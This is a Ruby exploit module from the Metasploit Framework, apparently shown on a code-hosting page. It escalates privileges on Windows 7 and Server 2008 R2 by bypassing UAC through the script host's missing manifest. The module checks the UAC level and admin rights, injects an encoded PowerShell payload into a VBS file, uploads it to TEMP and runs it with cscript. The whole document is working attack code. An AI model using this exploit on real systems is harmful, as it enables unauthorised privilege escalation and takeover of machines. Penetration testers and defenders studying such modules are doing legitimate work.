Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/local/bypassuac_vbs.rb
19664 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Exploit::FileDropper

10
  include Exploit::Powershell

11
  include Post::File

12
  include Post::Windows::Priv

13
  include Post::Windows::Runas

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)',

20
        'Description' => %q{

21
          This module will bypass Windows UAC by utilizing the missing .manifest on the script host

22
          cscript/wscript.exe binaries.

23
        },

24
        'License' => MSF_LICENSE,

25
        'Author' => [

26
          'Vozzie',

27
          'Ben Campbell'

28
        ],

29
        'Platform' => [ 'win' ],

30
        'SessionTypes' => [ 'meterpreter' ],

31
        'Targets' => [

32
          [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]

33
        ],

34
        'DefaultTarget' => 0,

35
        'References' => [

36
          ['URL', 'http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html'],

37
          ['URL', 'https://github.com/Vozzie/uacscript']

38
        ],

39
        'DisclosureDate' => '2015-08-22',

40
        'Notes' => {

41
          'Reliability' => UNKNOWN_RELIABILITY,

42
          'Stability' => UNKNOWN_STABILITY,

43
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

44
        }

45
      )

46
    )

47
  end

48


49
  def exploit

50
    # Validate that we can actually do things before we bother

51
    # doing any more work

52
    validate_environment!

53
    check_permissions!

54


55
    # get all required environment variables in one shot instead. This

56
    # is a better approach because we don't constantly make calls through

57
    # the session to get the variables.

58
    env_vars = get_envs('TEMP', 'WINDIR')

59


60
    case get_uac_level

61
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,

62
        UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,

63
        UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT

64
      fail_with(Failure::NotVulnerable,

65
                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")

66
    when UAC_DEFAULT

67
      print_good('UAC is set to Default')

68
      print_good('BypassUAC can bypass this setting, continuing...')

69
    when UAC_NO_PROMPT

70
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')

71
      shell_execute_exe

72
      return

73
    end

74


75
    vbs_filepath = "#{env_vars['TEMP']}\\#{rand_text_alpha(8)}.vbs"

76


77
    upload_vbs(vbs_filepath)

78


79
    cmd_exec("cscript.exe //B #{vbs_filepath}")

80
  end

81


82
  def check_permissions!

83
    # Check if you are an admin

84
    vprint_status('Checking admin status...')

85
    admin_group = is_in_admin_group?

86


87
    if admin_group.nil?

88
      print_error('Either whoami is not there or failed to execute')

89
      print_error('Continuing under assumption you already checked...')

90
    elsif admin_group

91
      print_good('Part of Administrators group! Continuing...')

92
    else

93
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')

94
    end

95


96
    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]

97
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')

98
    end

99
  end

100


101
  def upload_vbs(payload_filepath)

102
    vbs = File.read(File.join(Msf::Config.data_directory,

103
                              'exploits',

104
                              'scripthost_uac_bypass',

105
                              'bypass.vbs'))

106


107
    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true)

108


109
    vbs.gsub!('COMMAND', command)

110
    print_status('Uploading the Payload VBS to the filesystem...')

111
    begin

112
      vprint_status("Payload VBS #{vbs.length} bytes long being uploaded..")

113
      write_file(payload_filepath, vbs)

114
      register_file_for_cleanup(payload_filepath)

115
    rescue Rex::Post::Meterpreter::RequestError => e

116
      fail_with(Failure::Unknown, "Error uploading file #{payload_filepath}: #{e.class} #{e}")

117
    end

118
  end

119


120
  def validate_environment!

121
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?

122


123
    version = get_version_info

124
    if version.win7_or_2008r2?

125
      print_good("#{version.product_name} may be vulnerable.")

126
    else

127
      fail_with(Failure::NotVulnerable, "#{version.product_name} is not vulnerable.")

128
    end

129


130
    if is_uac_enabled?

131
      print_status('UAC is Enabled, checking level...')

132
    else

133
      unless is_in_admin_group?

134
        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')

135
      end

136
    end

137
  end

138
end

139


140